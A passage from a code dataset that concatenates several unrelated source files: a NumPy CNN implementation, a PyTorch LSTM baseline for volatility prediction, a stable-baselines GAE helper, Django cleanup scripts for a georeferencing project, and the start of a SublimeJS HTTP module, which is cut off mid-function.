max_pool_for_back2[:, :] = 0
max_pool_for_back2[max_index2] = 1
max_pool_for_back23 = max_pool_for_back2.reshape(bach, num_filters, h, w)
max_pool_for_back = max_pool_for_back23
self.max_pool_for_back = max_pool_for_back
self.output = output
return output
def backward(self, grad_p):
"""
        Create a tensor the same size as the original input, set the positions of each pooling region's maximum to 1, then multiply that tensor by grad_p.
        Equivalently: set the positions of each region's maximum directly to the corresponding value in grad_p.
        :param grad_p:
:return:
"""
grad_p = np.repeat(grad_p, self.kernel_size, axis=2)
grad_p = np.repeat(grad_p, self.kernel_size, axis=3)
new_grad_p = self.max_pool_for_back * grad_p
return new_grad_p
class Dropout(BasicModule):
def __init__(self, p=0.25):
"""实现 dropout2d 激活函数"""
self.forward_output = None
self.p = p
self.filters = None
def forward(self, prev_data):
        tmp = np.zeros(prev_data.shape)
if np.ndim(prev_data) == 2:
b, l = prev_data.shape
tmp[0] = np.random.rand(1, l)
self.filters = (np.random.rand(b, l) > self.p).astype(np.float32)
elif np.ndim(prev_data) == 3:
b, c, l = prev_data.shape
tmp[0] = np.random.rand(1, c, l)
self.filters = (np.random.rand(b, c, l) > self.p).astype(np.float32)
else:
b, c, h, w = prev_data.shape
tmp[0] = np.random.rand(1, c, h, w)
self.filters = (np.random.rand(b, c, h, w) > self.p).astype(np.float32)
for i in range(1,prev_data.shape[0]):
tmp[i] = tmp[0]
self.filters = (tmp > self.p).astype(np.float32)
result = prev_data * self.filters
return result
def backward(self, grad_b):
result = grad_b * self.filters
return result
class Softmax(BasicModule):
def __init__(self):
"""实现 Softmax 激活函数"""
self.forward_output = None
        self.epsilon = 1e-12  # guard against a zero denominator in the gradient
def forward(self, prev_data):
p_exp = np.exp(prev_data - np.max(prev_data, axis=0))
# p_exp = np.exp(prev_data)
denominator = np.sum(p_exp, axis=0, keepdims=True)
self.forward_output = p_exp / denominator
return self.forward_output
def backward(self, grad_b):
"""
:param grad_b:
:return:
https://themaverickmeerkat.com/2019-10-23-Softmax/
"""
# forward_output = self.forward_output
# _input_grad = np.array([])
# c = forward_output.shape[0]
# for i in range(forward_output.shape[1]):
# _forward_output = forward_output[:, i]
# d_softmax = _forward_output * np.identity(c) - _forward_output.reshape(c, 1) @ _forward_output.reshape(1, c)
# input_grad = grad_b[:, i] @ d_softmax
# _input_grad = np.append(_input_grad, input_grad)
# _input_grad = _input_grad.reshape(int(_input_grad.shape[0] / c), c)
#
# return _input_grad.T
return grad_b
# cross-entropy loss
class CrossEntropy(BasicModule):
def __init__(self):
self.pre_data = None
        self.epsilon = 1e-12  # guard against a zero denominator in the gradient
def forward(self, prev_data, y):
self.pre_data = prev_data
log_p = np.log(prev_data + self.epsilon)
result = np.mean(np.sum(-y * log_p, axis=0))
return result
def backward(self, y):
p = self.pre_data
# return -y * (1 / (p + self.epsilon))
result = p - y
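        # note (added): p - y is the combined gradient of softmax followed by
        # cross-entropy with respect to the pre-softmax inputs, which is why
        # Softmax.backward above simply passes the incoming gradient through.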
return result
# mean squared error loss
class MeanSquaredError(BasicModule):
def __init__(self):
self.mem = {}
def forward(self, p, y):
"""
        :param p: output of the network's final layer
        :param y: ground-truth labels
:return:
"""
self.mem['p'] = p
return (y - p) * (y - p) / 2
def backward(self, y):
p = self.mem['p']
return y - p
# build the neural network model
class FirstNet(BasicModule):
def __init__(self, l_r):
self.pre_loss = 0
BasicModule.l_r = l_r
self.head = [
[Conv2d(1, 1, 3, padding=1),
Relu()],
[Conv2d(1, 1, 3, padding=1),
Relu()],
[Conv2d(1, 1, 3, padding=1),
Relu()],
[Conv2d(1, 1, 3, padding=1),
Relu()],
[Conv2d(1, 1, 3, padding=1),
Relu()],
[Conv2d(1, 1, 3, padding=1),
Relu()],
[Conv2d(1, 1, 3, padding=1),
Relu()],
]
self.hides = [
Conv2d(1, 32, 5,padding=4),
Relu(),
Conv2d(32, 64, 5, padding=2),
Relu(),
MaxPool2d(2),
Dropout(),
Flatting(),
LinearLayer(16384, 256),
Relu(),
Dropout(0.5),
LinearLayer(256, 10),
Softmax()]
# self.hides = [
# Conv2d(1, 16, 5, padding=2),
# Relu(),
# Conv2d(16, 32, 5, padding=2),
# Relu(),
# Conv2d(32, 64, 5, padding=2),
# Dropout(0.1),
# MaxPool2d(2),
# Relu(),
# Conv2d(64, 128, 5, padding=2),
# Relu(),
# Conv2d(128, 256, 5, padding=2),
# Dropout(0.1),
# MaxPool2d(2),
# Relu(),
# Flatting(),
# LinearLayer(12544, 10),
# Softmax()]
self.error_measure = CrossEntropy()
def forward(self, x, labels):
# x = np.array(x, dtype=float)
        # x = (x - np.mean(x, axis=(2, 3), keepdims=True)) / np.std(x, axis=(2, 3), keepdims=True)  # standardize x
# b0, n0, h0, w0 = x.shape
# head_layels = np.zeros((b0, len(self.head) + 1, h0, w0))
# head_layels[:, 0:1, :, :] = x[:, :, :, :]
# count = 1
# for n in self.head:
# x = n[0].forward(x)
# x = n[1].forward(x)
# head_layels[:, count:count + 1, :, :] = x
# count += 1
# x = head_layels.reshape(b0, len(self.head) + 1, 28, 28)
for n in self.hides:
x = n.forward(x)
loss = self.error_measure.forward(x, labels)
self.pre_loss = loss
return x, loss
def predict(self, x, labels):
for n in self.hides:
            if n.__class__.__name__ == 'Dropout':
continue
x = n.forward(x)
loss = self.error_measure.forward(x, labels)
self.pre_loss = loss
return x, loss
def backward(self, labels):
loss_grad = self.error_measure.backward(labels)
for n in reversed(self.hides):
loss_grad = n.backward(loss_grad)
# for l in range(1, loss_grad.shape[1]):
# _loss_grad = loss_grad[:, l:l + 1, :, :]
# for n in reversed(self.head[0:l]):
# _loss_grad = n[1].backward(_loss_grad)
# _loss_grad = n[0].backward(_loss_grad)
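# Minimal end-to-end sketch (added for illustration; the 28x28 input size and the
# 10-class one-hot labels of shape (10, batch) are assumptions inferred from the
# layer sizes used in self.hides above):
if __name__ == '__main__':
    net = FirstNet(l_r=0.01)
    x = np.random.randn(4, 1, 28, 28)                # a batch of 4 single-channel images
    y = np.eye(10)[:, np.random.randint(0, 10, 4)]   # one-hot labels, shape (10, 4)
    probs, loss = net.forward(x, y)
    net.backward(y)                                  # one gradient update with learning rate l_r
    print('loss:', loss)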
``` |
{
"source": "7568/ORVP",
"score": 2
} |
#### File: 7568/ORVP/v2-pytorch-baseline.py
```python
import os
import gc
import glob
import torch
from torch import nn
import torch.nn.functional as F
import torch.optim as optim
import numpy as np
import pandas as pd
import time
from itertools import islice
from torch.utils.data import Dataset, DataLoader
from multiprocessing import Pool
from sklearn.preprocessing import MinMaxScaler, StandardScaler
from sklearn.model_selection import train_test_split
from torch.utils.tensorboard import SummaryWriter
from tqdm.auto import tqdm
import logging
import resource
rlimit = resource.getrlimit(resource.RLIMIT_NOFILE)
resource.setrlimit(resource.RLIMIT_NOFILE, (2048, rlimit[1]))
datefmt = '%Y-%m-%d %H:%M:%S'
logging.basicConfig(filename='pytorch-baseline.log', filemode='w', format='%(asctime)s - %(levelname)s - %(message)s',
datefmt=datefmt, level=logging.DEBUG)
# import tqdm
tqdm.pandas()
import warnings
from multiprocessing import cpu_count
def get_path_dict(f, v):
f_dict = {}
for i in tqdm(v):
fpath = f'{f}/stock_id={i}'
flist = glob.glob(os.path.join(fpath, '*.parquet'))
if len(flist) > 0:
f_dict[i] = flist[0]
return f_dict
# train_idx, valid_idx = train_test_split(train_ds['row_id'], shuffle=True, test_size=0.1, random_state=SEED)
# ds: data from train.csv; f_dict: data from book_train.parquet
def process_optiver_ds(ds, f_dict, skip_cols, t_dict):
x = []
y = []
full_seconds_in_bucket = {'seconds_in_bucket': np.arange(600)}
full_seconds_in_bucket = pd.DataFrame(full_seconds_in_bucket)
for stock_id, stock_fnmame in tqdm(f_dict.items()):
trade_train_ = t_dict.get(stock_id)
trade_train_ = pd.read_parquet(trade_train_)
optiver_ds = pd.read_parquet(stock_fnmame)
time_ids = optiver_ds['time_id'].unique()
for time_id in time_ids:
optiver_ds_ = optiver_ds[optiver_ds['time_id'] == time_id]
optiver_ds_ = pd.merge(full_seconds_in_bucket, optiver_ds_, how='left', on='seconds_in_bucket')
optiver_ds_ = pd.merge(optiver_ds_, trade_train_[trade_train_['time_id'] == time_id], how='left',
on='seconds_in_bucket')
# optiver_ds_.drop(skip_cols)
optiver_ds_.drop(['time_id_x', 'time_id_y'], axis=1)
optiver_ds_ = np.nan_to_num(optiver_ds_)
row_id = str(stock_id) + '-' + time_id.astype(str)
r = ds[ds['row_id'] == row_id]['target']
x.append(optiver_ds_)
y.append(r)
return x, y
def chunks(data, SIZE=10000):
it = iter(data)
for i in range(0, len(data), SIZE):
yield {k: data[k] for k in islice(it, SIZE)}
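# For example (illustration only): chunks({'a': 1, 'b': 2, 'c': 3}, SIZE=2) yields
# {'a': 1, 'b': 2} and then {'c': 3}.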
def process_book_train_chunk(chunk_ds):
return process_optiver_ds(train_ds, chunk_ds, book_skip_columns, trade_train_dict)
def process_book_test_chunk(chunk_ds):
return process_optiver_ds(test_ds, chunk_ds, book_skip_columns, trade_test_dict)
'''
# split the samples into 4 chunks, each holding 28 entries
book_train_chunks = [i for i in chunks(book_train_dict, int(len(book_train_dict) / NTHREADS))]
# trade_train_chunks = [i for i in chunks(trade_train_dict, int(len(trade_train_dict) / NTHREADS))]
z = 1 if len(book_test_dict) < NTHREADS else NTHREADS
book_test_chunks = [i for i in chunks(book_test_dict, int(len(book_test_dict) / z))]
# trade_test_chunks = [i for i in chunks(trade_test_dict, int(len(trade_test_dict) / z))]
pool = Pool(NTHREADS)  # create a process pool with at most NTHREADS processes
r = pool.map(process_book_train_chunk, book_train_chunks)
pool.close()
a1, a2 = zip(*r)
pool = Pool(NTHREADS)  # create a process pool with at most NTHREADS processes
r = pool.map(process_book_test_chunk, book_test_chunks)
pool.close()
t_a1, t_a2 = zip(*r)
np_train = a1
np_target = a2'''
# Scaler
# transformers = []
# for i in tqdm(range(np_train.shape[1])):
# a = np.nan_to_num(np_train[train_idx])
# b = np.nan_to_num(np_train[valid_idx])
#
# transformer = StandardScaler() # StandardScaler is very useful!
# np_train[train_idx] = transformer.fit_transform(a)
# np_train[valid_idx] = transformer.transform(b)
# transformers.append(transformer) # Save Scalers for the inference stage
class LSTMModel(nn.Module):
"""Container module with an encoder, a recurrent module, and a decoder."""
def __init__(self, ntoken, ninp, nhid, nlayers, dropout=0.1):
super(LSTMModel, self).__init__()
# self.drop = nn.Dropout(dropout)
# self.encoder = nn.Embedding(ntoken, ninp)
self.rnn = nn.LSTM(ninp + input_features_num, nhid + input_features_num, nlayers, dropout=dropout,
batch_first=True, bidirectional=True)
self.regress_rnn = nn.Sequential(
nn.BatchNorm1d(2 * nhid + 2 * input_features_num),
nn.Linear(2 * nhid + 2 * input_features_num, 1),
nn.Sigmoid()
)
self.decoder = nn.Sequential(
nn.BatchNorm1d(3 * nhid + 2 * input_features_num),
nn.Linear(3 * nhid + 2 * input_features_num, nhid + input_features_num),
nn.ReLU(),
nn.Dropout(0.2),
nn.BatchNorm1d(nhid + input_features_num),
nn.Linear(nhid + input_features_num, ntoken),
nn.ReLU(),
nn.Dropout(0.1),
nn.BatchNorm1d(ntoken),
nn.Linear(ntoken, 1),
nn.Sigmoid()
)
self.self_attention = nn.Sequential(
nn.Linear(3 * nhid + 2 * input_features_num, 10 * (nhid + input_features_num)),
nn.ReLU(),
nn.Dropout(0.2),
nn.Linear(10 * (nhid + input_features_num), 10 * (nhid + input_features_num)),
nn.ReLU(),
nn.Dropout(0.2),
nn.Linear(10 * (nhid + input_features_num), 3 * nhid + 2 * input_features_num),
nn.Softmax(dim=1)
)
# self.decoder_1 = nn.Linear(nhid, ntoken)
# self.decoder_2 = nn.Linear(ntoken, 1)
self.conv1d_relu_stack = nn.Sequential(
nn.Conv1d(in_channels=600, out_channels=1200, kernel_size=3),
nn.Dropout(0.1),
nn.ReLU(), # 9
nn.Conv1d(in_channels=1200, out_channels=1200, kernel_size=3),
nn.Dropout(0.2),
nn.ReLU(), # 7
nn.Conv1d(in_channels=1200, out_channels=1200, kernel_size=3),
nn.Dropout(0.2),
nn.ReLU(), # 5
nn.Conv1d(in_channels=1200, out_channels=600, kernel_size=3),
nn.Dropout(0.1),
nn.ReLU(), # 3
nn.Conv1d(in_channels=600, out_channels=nhid, kernel_size=3),
nn.ReLU(), # 1
)
self.regress_conv = nn.Sequential(
nn.BatchNorm1d(nhid),
nn.Linear(nhid, 1),
nn.Sigmoid()
)
self.linear_relu_stack = nn.Sequential(
nn.Linear(input_features_num, ntoken),
nn.Dropout(0.1),
nn.ReLU(),
nn.Linear(ntoken, ninp),
nn.Dropout(0.2),
nn.ReLU(),
nn.Linear(ninp, ninp),
nn.Dropout(0.2),
nn.ReLU(),
)
self.ninp = ninp
self.nhid = nhid
self.nlayers = nlayers
def forward(self, input):
# emb = self.drop(self.encoder(input))
cov_logits = self.conv1d_relu_stack(input)
cov_logits = cov_logits.view(cov_logits.shape[0], cov_logits.shape[1])
regress_conv_out = self.regress_conv(cov_logits)
logits = self.linear_relu_stack(input)
logits = torch.cat((logits, input), 2)
# logits = logits.view(1, len(logits), -1)
output, hidden = self.rnn(logits)
output = output[:, -1, :]
regress_rnn_out = self.regress_rnn(output)
new_logits = torch.cat((cov_logits, output), 1)
# attention_output = self.self_attention(new_logits)
# output = self.drop(output)
new_logits = torch.mul(new_logits, self.self_attention(new_logits))
# decoded_out = self.decoder(new_logits)
decoded_out = self.decoder(new_logits)
# decoded_2 = self.decoder_2(decoded_1)
return regress_conv_out, regress_rnn_out, decoded_out
def init_hidden(self, bsz):
weight = next(self.parameters())
return (weight.new_zeros(self.nlayers, bsz, self.nhid),
weight.new_zeros(self.nlayers, bsz, self.nhid))
# dataloader = DataLoader(transformed_dataset, batch_size=4,
# shuffle=True, num_workers=0)
def rmspe(y_pred,y_true):
rms = np.sqrt(np.mean(np.square((y_true - y_pred) / y_true)))
return rms
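# Quick sanity check (illustration only): a prediction that is 10% off on every
# element has RMSPE 0.1, e.g. rmspe(np.array([1.1, 2.2]), np.array([1.0, 2.0])) ~= 0.1.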
def RMSPELoss(y_pred, y_true):
return torch.sqrt(torch.mean(((y_true - y_pred) / y_true) ** 2)).clone()
def do_process(optiver_ds, full_seconds_in_bucket, trade__, time_id):
optiver_ds_ = optiver_ds[optiver_ds['time_id'] == time_id]
if optiver_ds_.size == 0:
return None
optiver_ds_ = pd.merge(full_seconds_in_bucket, optiver_ds_, how='left', on='seconds_in_bucket')
optiver_ds_ = pd.merge(optiver_ds_, trade__[trade__['time_id'] == time_id], how='left',
on='seconds_in_bucket')
# optiver_ds_.drop(skip_cols)
optiver_ds_ = optiver_ds_.drop(['time_id_x', 'time_id_y', 'seconds_in_bucket'], axis=1)
optiver_ds_ = np.nan_to_num(optiver_ds_)
    # TODO: standardize each column
for i in range(optiver_ds_.shape[1]):
if np.sum(optiver_ds_[:, i]) != 0 and np.std(optiver_ds_[:, i]) != 0:
optiver_ds_[:, i] = (optiver_ds_[:, i] - np.mean(optiver_ds_[:, i])) / np.std(optiver_ds_[:, i])
return optiver_ds_
def process_train_bach(arg):
# input_0 = []
# target_0 = []
stock_id = arg['stock_id']
time_id = arg['time_id']
# optiver_ds = arg['optiver_ds']
# full_seconds_in_bucket = arg['full_seconds_in_bucket']
# trade_train_ = arg['trade_train_']
path = f"{DATA_PATH}formated_data/{stock_id}/"
optiver_ds_ = pd.read_parquet(f'{path}{time_id}.parquet').to_numpy()
# row_id = str(stock_id) + '-' + time_id.astype(str)
np_target = pd.read_parquet(f'{path}{time_id}_target.parquet')['target'].to_numpy()
return optiver_ds_, np_target[0]
def process_test_bach(time_id, ARGS):
optiver_ds = ARGS['optiver_ds']
full_seconds_in_bucket = ARGS['full_seconds_in_bucket']
trade_test_ = ARGS['trade_test_']
optiver_ds_ = do_process(optiver_ds, full_seconds_in_bucket, trade_test_, time_id)
return optiver_ds_
def train_bach(epoch):
# lstmmodel.load_state_dict(torch.load('train_out/model_weights_240.pth'))
    full_seconds_in_bucket = {'seconds_in_bucket': np.arange(600)}  # seconds_in_bucket goes up to 600 and is not contiguous in the training data; make it contiguous here
full_seconds_in_bucket = pd.DataFrame(full_seconds_in_bucket)
# lstmmodel.zero_grad()
    # pool = Pool(30)  # create a process pool with at most NTHREADS processes
for stock_id, stock_fnmame in book_train_dict.items():
trade_train_parquet = trade_train_dict.get(stock_id)
trade_train_ = pd.read_parquet(trade_train_parquet)
book_train = pd.read_parquet(stock_fnmame)
loss_0_each_stock = []
loss_1_each_stock = []
loss_2_each_stock = []
loss_each_stock = []
output_each_stock = []
target_each_stock = []
each_stock_train_data = {}
time_ids = book_train['time_id'].unique()
params = []
# time_ids=time_ids[1:20]
        # each pass loads all of the pre-formatted data for one stock
for time_id in tqdm(time_ids):
ARGS_ = dict(optiver_ds=book_train, full_seconds_in_bucket=full_seconds_in_bucket,
trade_train_=trade_train_, stock_id=stock_id, time_id=time_id)
params.append(ARGS_)
# input_, target_ = process_train_bach(ARGS_)
# each_stock_train_data[time_id] = dict(input_=input_, target_=target_)
with Pool(8) as p:
r = p.map(process_train_bach, params)
input_, target_ = zip(*r)
for i in range(len(time_ids)):
each_stock_train_data[time_ids[i]] = dict(input_=input_[i], target_=target_[i])
        # draw a small batch at a time, over several iterations
for i in tqdm(range(int(len(time_ids) / 20))):
time_ids = np.random.choice(time_ids, 50)
input_0 = []
target_0 = []
for time_id in time_ids:
input_0.append(each_stock_train_data[time_id]['input_'])
target_0.append([each_stock_train_data[time_id]['target_']])
input_1 = torch.tensor(input_0, dtype=torch.float32, requires_grad=True).to(device)
target_ = torch.tensor(target_0, dtype=torch.float32).to(device)
conv_out, rnn_out, output_2 = lstmmodel(input_1)
loss_0 = criterion(conv_out, target_)
loss_1 = criterion(rnn_out, target_)
loss_2 = RMSPELoss(output_2, target_)
loss_ = torch.mul(0.1, loss_0) + torch.mul(0.1, loss_1) + loss_2
optimizer_2.zero_grad()
loss_.backward(retain_graph=True)
optimizer_2.step()
output_each_stock.append(output_2.cpu().detach().numpy().ravel())
target_each_stock.append(np.array(target_0).ravel())
loss_0_each_stock.append(loss_0.item())
loss_1_each_stock.append(loss_1.item())
loss_2_each_stock.append(loss_2.item())
loss_each_stock.append(loss_.item())
mean_loss_0 = np.mean(loss_0_each_stock)
mean_loss_1 = np.mean(loss_1_each_stock)
mean_loss_2 = np.mean(loss_2_each_stock)
mean_loss = np.mean(loss_each_stock)
logging.debug(f'epoch = {epoch} , stock_id = {stock_id} , loss_each_stock : {mean_loss}')
rmspe_ = rmspe(np.array(output_each_stock), np.array(target_each_stock))
logging.debug(
f'epoch = {epoch} , stock_id = {stock_id} , rmspe each stock : {rmspe_}')
# loss_all.append(np.mean(loss_each_stock))
writer.add_scalar('V2-LOSS_0', mean_loss_0, writer.count)
writer.add_scalar('V2-LOSS_1', mean_loss_1, writer.count)
writer.add_scalar('V2-LOSS_2', mean_loss_2, writer.count)
writer.add_scalar('V2-LOSS', mean_loss, writer.count)
writer.add_scalar('V2-rmspe', rmspe_, writer.count)
writer.count += 1
torch.save(lstmmodel.state_dict(), 'train_out/model_weights_' + str(epoch) + '.pth')
        # evaluate on the validation set after each epoch
# with torch.no_grad():
# test()
# idx = np.arange(np_train.shape[0])
# train_idx, valid_idx = train_test_split(idx, shuffle=True, test_size=0.1, random_state=SEED)
def start_train():
for epoch in range(1, EPOCH_ACCOUNT):
train_bach(epoch)
def predict():
full_seconds_in_bucket = {'seconds_in_bucket': np.arange(600)}
full_seconds_in_bucket = pd.DataFrame(full_seconds_in_bucket)
# lstmmodel.zero_grad()
loss_all = []
    # pool = Pool(30)  # create a process pool with at most NTHREADS processes
target = []
for index, row in test_ds.iterrows():
# print(row['stock_id'])
stock_id = row['stock_id']
trade_test_id = book_train_dict.get(stock_id)
trade_test_ = pd.read_parquet(trade_test_id)
optiver_ds = pd.read_parquet(book_test_dict.get(stock_id))
time_id = row['time_id']
ARGS = dict(optiver_ds=optiver_ds, full_seconds_in_bucket=full_seconds_in_bucket, trade_test_=trade_test_,
stock_id=stock_id)
input_0 = process_test_bach(time_id, ARGS)
if input_0 is None:
target.append(0)
continue
input_0 = input_0[None, :, :]
input_1 = torch.tensor(input_0, dtype=torch.float32, requires_grad=True).to(device)
with torch.no_grad():
output_2, _ = lstmmodel(input_1)
target.append(output_2.item())
test_ds['target'] = target
# print(test_ds)
test_ds[['row_id', 'target']].to_csv('submission.csv', index=False)
if __name__ == '__main__':
logging.debug('-------- start -----------')
# print("CPU的核数为:{}".format(cpu_count()))
NTHREADS = cpu_count()
SEED = 42
TRAIN_BATCH_SIZE = 3
TEST_BATCH_SIZE = 256
EPOCH_ACCOUNT = 250
# DATA_PATH = '../input/optiver-realized-volatility-prediction'
DATA_PATH = '/home/data/optiver-realized-volatility-prediction/'
# DATA_PATH = '/home/szu/liyu/data/optiver-realized-volatility-prediction/'
BOOK_TRAIN_PATH = DATA_PATH + 'book_train.parquet'
TRADE_TRAIN_PATH = DATA_PATH + 'trade_train.parquet'
BOOK_TEST_PATH = DATA_PATH + 'book_test.parquet'
TRADE_TEST_PATH = DATA_PATH + 'trade_test.parquet'
train_ds = pd.read_csv(os.path.join(DATA_PATH, 'train.csv'))
test_ds = pd.read_csv(os.path.join(DATA_PATH, 'test.csv'))
print(f'Train ds shape: {train_ds.shape}')
print(f'Test ds shape: {test_ds.shape}')
train_ds['row_id'] = train_ds['stock_id'].astype(str) + '-' + train_ds['time_id'].astype(str)
book_train_dict = get_path_dict(BOOK_TRAIN_PATH, train_ds['stock_id'].unique())
trade_train_dict = get_path_dict(TRADE_TRAIN_PATH, train_ds['stock_id'].unique())
book_test_dict = get_path_dict(BOOK_TEST_PATH, test_ds['stock_id'].unique())
trade_test_dict = get_path_dict(TRADE_TEST_PATH, test_ds['stock_id'].unique())
book_skip_columns = trade_skip_columns = ['time_id', 'row_id', 'target']
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# device = torch.device("cpu")
print(device)
input_features_num = 11
lstmmodel = LSTMModel(
ntoken=input_features_num * 8,
ninp=input_features_num * 10,
nhid=input_features_num * 10,
nlayers=5,
).to(device)
# lstmmodel.load_state_dict(torch.load('train_out/model_weights_2.pth'))
# lstmmodel.eval()
print(lstmmodel)
criterion = nn.MSELoss()
optimizer_2 = optim.Adam(lstmmodel.parameters(), lr=0.00001)
writer = SummaryWriter()
writer.count = 1
# predict()
start_train()
``` |
{
"source": "757670303037/stable-baselines",
"score": 2
} |
#### File: stable_baselines/trpo_mpi/utils.py
```python
import numpy as np
def add_vtarg_and_adv(seg, gamma, lam):
"""
Compute target value using TD(lambda) estimator, and advantage with GAE(lambda)
:param seg: (dict) the current segment of the trajectory (see traj_segment_generator return for more information)
:param gamma: (float) Discount factor
:param lam: (float) GAE factor
"""
# last element is only used for last vtarg, but we already zeroed it if last new = 1
episode_starts = np.append(seg["episode_starts"], False)
vpred = np.append(seg["vpred"], seg["nextvpred"])
rew_len = len(seg["rewards"])
seg["adv"] = np.empty(rew_len, 'float32')
rewards = seg["rewards"]
lastgaelam = 0
for step in reversed(range(rew_len)):
nonterminal = 1 - float(episode_starts[step + 1])
delta = rewards[step] + gamma * vpred[step + 1] * nonterminal - vpred[step]
seg["adv"][step] = lastgaelam = delta + gamma * lam * nonterminal * lastgaelam
seg["tdlamret"] = seg["adv"] + seg["vpred"]
``` |
{
"source": "75RAUL/georef",
"score": 2
} |
#### File: georef/scripts/cleanupImagedata.py
```python
import django
from django.conf import settings
django.setup()
from geocamTiePoint.models import *
from geocamUtil import imageInfo
from geocamUtil.ErrorJSONResponse import ErrorJSONResponse, checkIfErrorJSONResponse
from geocamTiePoint.viewHelpers import *
from django.conf import settings
import sys
print sys.argv
"""
//0. add a sizeType field to imageData model and migrate
1. compile a list of all used imageData
for each overlay -> overlay.imageData and overlay.getRawImageData (make sure no dupes)
2. compile a list of all used quadtrees
for each overlay-> overlay.unalignedQtree / alignedQtree.
for each used imageData, search for corresponding quad tree QuadTree(imageData__key = self.key)
make sure there are no dupes
3. loop through image imageData,
make sure it's in the used ImageData list, if not, delete (DO THIS ON A COPY: AND delete its image / unenhancedImage/ enhancedImage!!!)
4. loop through quad trees, if it's not in a used quad tree list, delete.
"""
def listUsedImageData():
imageDataList = []
overlays = Overlay.objects.all()
for overlay in overlays:
try:
imageDataList.append(overlay.imageData.id)
except:
print "overlay %s has no image data" % overlay.name
try:
imageDataList.append(overlay.getRawImageData().id)
except:
print "overlay %s has no raw image!" % overlay.name
return list(set(imageDataList))
def listUsedQuadTrees():
qtreeList = []
overlays = Overlay.objects.all()
imdList = listUsedImageData()
for overlay in overlays:
try:
qtreeList.append(overlay.unalignedQuadTree.id)
except:
pass
try:
qtreeList.append(overlay.alignedQuadTree.id)
except:
pass
for imd in imdList:
try:
            qtreeList.append(QuadTree.objects.get(imageData = imd).id)
except:
pass
return list(set(qtreeList))
def listUsedImages():
goodImages = []
goodImageData = listUsedImageData()
for imdata_id in goodImageData:
imageData = ImageData.objects.get(id=imdata_id)
try:
goodImages.append(imageData.image.name.split('/')[-1])
except:
pass
try:
goodImages.append(imageData.unenhancedImage.name.split('/')[-1])
except:
pass
try:
goodImages.append(imageData.unenhancedImage.name.split('/')[-1])
except:
pass
return list(set(goodImages))
"""
Main functions
"""
def cleanupImageData():
goodImageData = listUsedImageData()
allImdata = ImageData.objects.all()
for imdata in allImdata:
print "image data %d" % imdata.id
if imdata.id not in goodImageData:
print "%d deleted" % imdata.id
imdata.delete()
def cleanupQuadTrees():
goodQtrees = listUsedQuadTrees()
allQtrees = QuadTree.objects.all()
for qtree in allQtrees:
print "qtree %d" % qtree.id
if qtree.id not in goodQtrees:
print "%d deleted" % qtree.id
qtree.delete()
def cleanupImageFiles():
# get all the image file names stored in good image data.
#goodImageData = listUsedImageData()
#list all files in the data directory
from os import listdir
from os.path import isfile, join
goodImages = listUsedImages()
print "good images are"
print goodImages
mypath = '/home/geocam/georef/data/geocamTiePoint/overlay_images'
# mypath = '/home/vagrant/gds/georef/data/geocamTiePoint/overlay_images'
onlyfiles = [f for f in listdir(mypath) if isfile(join(mypath, f))]
for file in onlyfiles:
print "file name %s" % file
if file not in goodImages:
print "%s deleted" % file
os.remove(mypath + '/' + file)
def createRawImageData():
overlays = Overlay.objects.all()
for overlay in overlays:
try:
mission, roll, frame = overlay.name.split('.')[0].split('-')
except:
continue
raw = overlay.getRawImageData()
if not raw:
print "no raw imagedata exists for overlay %d" % overlay.pk
oldImageData = None
oldImageData = overlay.imageData
if oldImageData is None:
print "Error: overlay %d has no image data!" % overlay.pk
continue
        sizeType = None
try:
if oldImageData.image.size < 600000:
sizeType = 'small'
else:
sizeType = 'large'
except:
continue
issImage = ISSimage(mission, roll, frame, sizeType)
imageUrl = issImage.imageUrl
# get image data from url
imageFile = imageInfo.getImageFile(imageUrl)
if checkIfErrorJSONResponse(imageFile):
continue
rawImageData = createImageData(imageFile, True)
print "new raw imagedata %d saved for overlay %d" % (rawImageData.id, overlay.pk)
rawImageData.overlay = overlay
rawImageData.save()
def __main__():
arg1 = sys.argv[1]
if arg1 == '1':
cleanupImageData()
elif arg1 == '2':
cleanupQuadTrees()
elif arg1 == '3':
cleanupImageFiles()
elif arg1 == '4':
createRawImageData()
else:
print "Wrong argument. Either needs to be 1 2 or 3"
pass # do nothing
__main__()
# def buildQuadTreeImageDictionary():
# """
# Builds a dict that maps a used (by overlay) quadtree id to issMRF
# """
# dict = {} # key is quad tree id, value is issMRF
# overlays = Overlay.objects.all()
# for overlay in overlays:
# dict[overlay.unalignedQuadTree.id] = overlay.imageData.issMRF
# dict[overlay.alignedQuadTree.id] = overlay.imageData.issMRF
#
# return dict
#
# def cleanupQuadTrees():
# """
# Deletes unused quad tree objects
# """
# dict = buildQuadTreeImageDictionary()
# qtrees = QuadTree.objects.all()
# for tree in qtrees:
# if tree.id not in dict.keys():
# tree.delete()
#
#
# def cleanupImageData():
# overlays = Overlay.objects.all()
# for overlay in overlays:
# overlay.getRawImageData()
#
# def generateImageData():
# for overlay in overlays:
# issID = overlay.name.split('.')[0].split('-')
# mission = issID[0]
# roll = issID[1]
# frame = issID[2]
# issImage = ISSimage(mission, roll, frame, sizeType)
# imageUrl = issImage.imageUrl
# imageFile = imageInfo.getImageFile(imageUrl)
```
#### File: georef/scripts/moveCenterPtOutOfExtras.py
```python
import django
from django.conf import settings
django.setup()
from geocamTiePoint.models import Overlay
def moveCenterPtOutOfExtras():
overlays = Overlay.objects.all()
for overlay in overlays:
overlay.centerLat = overlay.extras.centerLat
overlay.centerLon = overlay.extras.centerLon
overlay.nadirLat = overlay.extras.nadirLat
overlay.nadirLon = overlay.extras.nadirLon
overlay.save()
moveCenterPtOutOfExtras()
``` |
{
"source": "75team/SublimeJS",
"score": 2
} |
#### File: SublimeJS/core/http.py
```python
import urllib.request
import urllib.parse
import threading
import sublime
from PyV8 import JSObject, JSArray, JSFunction
from SublimeJS.v8 import getContext, convert
class Http:
def request(self, options, callback=None):
def _call(host, port, auth, method, path, data='', headers={}, callback=None, *args):
data = urllib.parse.urlencode(data)
if(auth):
host = auth + '@' + host
url = 'http://' + host + ':' + str(port) + path;
res = None
try:
if(method == 'GET' and data != ''):
url = url + '?' + data
req = urllib.request.Request(url);
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor())
if(method != 'GET'):
res = opener.open(req, data)
else:
res = opener.open(req)
except Exception as ex:
pass
if(callback):
def _callback():
ctx = getContext()
ctx._js_ctx.enter()
callback(res)
ctx._js_ctx.leave()
sublime.set_timeout(_callback, 0)
options = convert(options)
host = ('hostname' in options and options['hostname']) or ('host' in options and options['host']) or 'localhost'
port = ('port' in options and options['port']) or 80
method = ('method' in options and options['method']) or 'GET'
path = ('path' in options and options['path']) or '/'
